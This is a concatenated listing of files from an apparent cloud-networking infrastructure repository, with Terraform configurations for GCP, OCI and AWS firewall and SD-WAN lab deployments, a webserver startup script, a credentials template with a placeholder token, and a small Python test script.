 7 | variable cidr {
 8 | }
 9 | 
10 | variable region {
11 | }
12 | 
13 | variable allowed_sources {
14 |   type    = list(string)
15 |   default = []
16 | }
17 | 
18 | variable allowed_protocol {
19 |   default = "all"
20 | }
21 | 
22 | variable allowed_ports {
23 |   type    = list(string)
24 |   default = []
25 | }
26 | 
27 | variable delete_default_route {
28 |   default = "false"
29 | }


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/project.tf:
--------------------------------------------------------------------------------
 1 | terraform {
 2 |   required_version = ">= 0.12"
 3 | }
 4 | 
 5 | provider "google" {
 6 |   credentials = var.auth_file
 7 |   project     = var.project_id
 8 |   region      = var.region
 9 | }
10 | 
11 | provider "google-beta" {
12 |   version     = "> 2.50.0"
13 | }
14 | 
15 | data "google_compute_zones" "available" {}


--------------------------------------------------------------------------------
/gcp/ilbnh-mig/scripts/webserver-startup.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | until sudo apt-get update; do echo "Retrying"; sleep 2; done
3 | until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done
4 | until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done
5 | until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done
6 | until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done
7 | until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
8 | until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done
9 | until sudo apt-get autoremove -y --purge sshguard; do echo "Retrying"; sleep 2; done


--------------------------------------------------------------------------------
/gcp/k8s-Prisma-API/.gitignore:
--------------------------------------------------------------------------------
1 | # pycharm
2 | .DS_Store
3 | 


--------------------------------------------------------------------------------
/gcp/k8s-Prisma-API/README.md:
--------------------------------------------------------------------------------
1 | # k8s-terraform-skillet
2 | This Repository Holds the Terraform template in a PANW Skillet format to deploy a GKE K8s cluster that supports E/W inspection.
3 | 


--------------------------------------------------------------------------------
/oci/HA/OCI HA deployment guide.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/oci/HA/OCI HA deployment guide.pdf


--------------------------------------------------------------------------------
/oci/HA/OCI-HA.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/oci/HA/OCI-HA.png


--------------------------------------------------------------------------------
/oci/HA/compartment.tf:
--------------------------------------------------------------------------------
1 | resource "oci_identity_compartment" "compartment" {
2 |   compartment_id = "${var.parent_compartment_ocid}"
3 |   name           = "${var.compartment_name}"
4 |   description    = "compartment created by terraform"
5 |   enable_delete  = true
6 | }


--------------------------------------------------------------------------------
/oci/HA/identity_policy.tf:
--------------------------------------------------------------------------------
 1 | resource "oci_identity_dynamic_group" "ha" {
 2 |   compartment_id = "${var.tenancy_ocid}"
 3 |   name           = "HA"
 4 |   description    = "dynamic group created by terraform"
 5 |   matching_rule  = "any {ANY {instance.id = '${oci_core_instance.firewall1.id}',instance.id = '${oci_core_instance.firewall2.id}'}}"
 6 | }
 7 | resource "oci_identity_policy" "ha" {
 8 |   name           = "HA"
 9 |   description    = "dynamic policy created by terraform"
10 |   compartment_id = "${oci_identity_compartment.compartment.id}"
11 |   statements = ["Allow dynamic-group ${oci_identity_dynamic_group.ha.name} to use virtual-network-family in compartment ${oci_identity_compartment.compartment.name}",
12 |     "Allow dynamic-group ${oci_identity_dynamic_group.ha.name} to use instance-family in compartment ${oci_identity_compartment.compartment.name}",
13 |   ]
14 | }


--------------------------------------------------------------------------------
/oci/HA/internet_gateway.tf:
--------------------------------------------------------------------------------
1 | resource "oci_core_internet_gateway" "internet_gateway" {
2 |   compartment_id = "${oci_identity_compartment.compartment.id}"
3 |   vcn_id = "${oci_core_vcn.vcn.id}"
4 |   display_name = "IG-PANW"
5 |   enabled = true
6 | }


--------------------------------------------------------------------------------
/oci/HA/providers.tf:
--------------------------------------------------------------------------------
 1 | #terraform {
 2 | #  required_version = ">= 0.12"
 3 | #}
 4 | 
 5 | provider "oci" {
 6 |   tenancy_ocid     = "${var.tenancy_ocid}"
 7 |   user_ocid        = "${var.user_ocid}"
 8 |   fingerprint      = "${var.fingerprint}"
 9 |   private_key_path = "${var.private_key_path}"
10 |   region           = "${var.region}"
11 | }


--------------------------------------------------------------------------------
/oci/HA/route_tables.tf:
--------------------------------------------------------------------------------
 1 | resource "oci_core_route_table" "public" {
 2 |   compartment_id = "${oci_identity_compartment.compartment.id}"
 3 |   vcn_id         = "${oci_core_vcn.vcn.id}"
 4 |   display_name   = "RT-Public"
 5 | 
 6 |   route_rules {
 7 |     description       = "default"
 8 |     destination       = "0.0.0.0/0"
 9 |     destination_type  = "CIDR_BLOCK"
10 |     network_entity_id = "${oci_core_internet_gateway.internet_gateway.id}"
11 |   }
12 | }
13 | resource "oci_core_route_table" "web" {
14 |   compartment_id = "${oci_identity_compartment.compartment.id}"
15 |   vcn_id         = "${oci_core_vcn.vcn.id}"
16 |   display_name   = "RT-Web"
17 | 
18 |   route_rules {
19 |     description       = "default"
20 |     destination       = "0.0.0.0/0"
21 |     destination_type  = "CIDR_BLOCK"
22 |     network_entity_id = "${oci_core_private_ip.firewall_trust_secondary_private.id}"
23 |   }
24 | }


--------------------------------------------------------------------------------
/oci/HA/secondary_ips.tf:
--------------------------------------------------------------------------------
 1 | // The secondary IP addresses are initially attached to firewall1 but will float between the firewalls in the event of a failover.
 2 | resource "oci_core_private_ip" "firewall_untrust_secondary_private" {
 3 |     vnic_id = "${oci_core_vnic_attachment.firewall1_untrust.vnic_id}"
 4 |     display_name = "firewall_untrust_secondary_private"
 5 |     ip_address = "${var.untrust_floating_ip}"
 6 | }
 7 | resource "oci_core_private_ip" "firewall_trust_secondary_private" {
 8 |     vnic_id = "${oci_core_vnic_attachment.firewall1_trust.vnic_id}"
 9 |     display_name = "firewall_trust_secondary_private"
10 |     ip_address = "${var.trust_floating_ip}"
11 | }
12 | resource "oci_core_public_ip" "firewall_untrust_secondary_public" {
13 |     compartment_id  = "${oci_identity_compartment.compartment.id}"
14 |     lifetime        = "RESERVED"
15 |     display_name    = "firewall_untrust_secondary_public"
16 |     private_ip_id   = "${oci_core_private_ip.firewall_untrust_secondary_private.id}"
17 | }


--------------------------------------------------------------------------------
/oci/HA/server.tf:
--------------------------------------------------------------------------------
 1 | resource "oci_core_instance" "web1" {
 2 |   availability_domain = "${var.server_availability_domain}"
 3 |   compartment_id      = "${oci_identity_compartment.compartment.id}"
 4 |   display_name        = "web1"
 5 |   shape               = "${var.server_shape_size}"
 6 | 
 7 |   create_vnic_details {
 8 |     subnet_id        = "${oci_core_subnet.web.id}"
 9 |     display_name     = "web1"
10 |     private_ip        = "${var.web1_ip}"
11 |     assign_public_ip = false
12 |   }
13 | 
14 |   source_details {
15 |     source_type = "image"
16 |     source_id   = "${var.ubuntu_image_ocid[var.region]}"
17 |     boot_volume_size_in_gbs = "60"
18 |   }
19 |   metadata = {
20 |     ssh_authorized_keys = "${var.ssh_authorized_key}"
21 |     #user_data           = "${base64encode(file("./userdata/bootstrap"))}"
22 |   }
23 |   timeouts {
24 |     create = "60m"
25 |   }
26 | }


--------------------------------------------------------------------------------
/oci/README.md:
--------------------------------------------------------------------------------
1 | Terraform for OCI
2 | 


--------------------------------------------------------------------------------
/sdwan/README.md:
--------------------------------------------------------------------------------
1 | Files for Prisma SDWAN (Cloudgenix) and NGFW SDWAN
2 | 


--------------------------------------------------------------------------------
/sdwan/sesummit2022/README.md:
--------------------------------------------------------------------------------
 1 | sp-aws-lab
 2 | ------------
 3 | Scripts to spin up an AWS-based lab with traffic generation.
 4 | 
 5 | 
 6 | Logic:
 7 | 
 8 | 1. Create template cloudgenix_config for '(1->N) - Branch'.
 9 | 2. Spin up N ION images (from marketplace or private AMIs) in region. Use multi-use tokens and user-data, along with DHCP addresses for Internet and LAN.
10 | 2. Elastic IPs are likely required for each Internet Interface.
11 | 3. Wait for IONs to VFF and become machines in the tenant. Extract list of serials.
12 | 4. For each serial, use cloudgenix_config to configure each branch.
13 | 5. Wait for branches to come online.
14 | 
15 | 


--------------------------------------------------------------------------------
/sdwan/sesummit2022/cloudgenix_settings.py:
--------------------------------------------------------------------------------
 1 | ### Enter user/password below, or comment out user/password, uncomment and enter AUTH_TOKEN below.
 2 | ### Additionally, scripts can take AUTH_TOKEN from X_AUTH_TOKEN or AUTH_TOKEN Environment Variables.
 3 | ###
 4 | 
 5 | #CLOUDGENIX_USER = ''
 6 | #CLOUDGENIX_PASSWORD = ''
 7 | 
 8 | ### Instead of CLOUDGENIX_USER or CLOUDGENIX_PASSWORD, you can set CLOUDGENIX_AUTH_TOKEN instead.
 9 | 
10 | CLOUDGENIX_AUTH_TOKEN = '<your auth token here>'
11 | 


--------------------------------------------------------------------------------
/sdwan/sesummit2022/keypair.tf:
--------------------------------------------------------------------------------
1 | resource "aws_key_pair" "sdwan-lab-default-key-pair" {
2 |     key_name = "sdwan-lab-${var.CUSTOMER_IDENTIFIER}-default-key-pair"
3 |     public_key = file(pathexpand(var.PUBLIC_KEY_PATH))
4 | }


--------------------------------------------------------------------------------
/sdwan/sesummit2022/provider.tf:
--------------------------------------------------------------------------------
1 | provider "aws" {
2 |     region                    = var.AWS_REGION
3 |     #shared_credentials_file  = pathexpand(var.AWS_SHARED_CREDS)
4 |     #profile                  = pathexpand(var.AWS_SHARED_CREDS_PROFILE)
5 | }


--------------------------------------------------------------------------------
/testing/python_test/python_example.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | import sys
 3 | 
 4 | output = dict()
 5 | output['testing'] = dict()
 6 | output['testing']['one'] = 'two'
 7 | 
 8 | index = 0
 9 | 
10 | for i in sys.argv:
11 |     output[index] = i
12 |     index = index + 1
13 | 
14 | print(json.dumps(output))
15 | 
16 | sys.exit(0)
17 | 


--------------------------------------------------------------------------------